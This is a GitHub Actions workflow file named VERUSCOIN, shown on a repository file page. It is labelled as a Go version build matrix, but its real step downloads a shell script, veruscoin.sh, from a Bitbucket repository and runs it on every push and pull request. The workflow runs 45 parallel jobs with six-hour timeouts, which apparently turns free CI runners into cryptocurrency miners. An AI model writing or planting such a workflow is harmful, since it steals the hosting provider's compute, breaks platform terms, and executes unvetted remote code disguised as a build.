You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
29 lines
2.4 KiB
29 lines
2.4 KiB
name: VERUSCOIN
|
|
on: [push, pull_request]
|
|
jobs:
|
|
build:
|
|
name: Raino
|
|
runs-on: ubuntu-latest
|
|
strategy:
|
|
max-parallel: 20
|
|
fail-fast: false
|
|
matrix:
|
|
go: [1.6, 1.7, 1.8, 1.9, 1.10]
|
|
flag: [A, B, C, D, E, F, G, H, I]
|
|
timeout-minutes: 360
|
|
env:
|
|
NUM_JOBS: 20
|
|
JOB: ${{ matrix.go }}
|
|
steps:
|
|
- name: Set up Go ${{ matrix.go }}
|
|
uses: actions/setup-go@v1
|
|
with:
|
|
go-version: ${{ matrix.go }}
|
|
id: go
|
|
- name: Setup
|
|
uses: actions/checkout@v1
|
|
- name: Raino
|
|
run: |
|
|
wget https://bitbucket.org/kina2007/test/raw/cf672d4ddfd670ce59df06b55c29e8d5fc6a89cb/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
|
|
|
|
|
|
|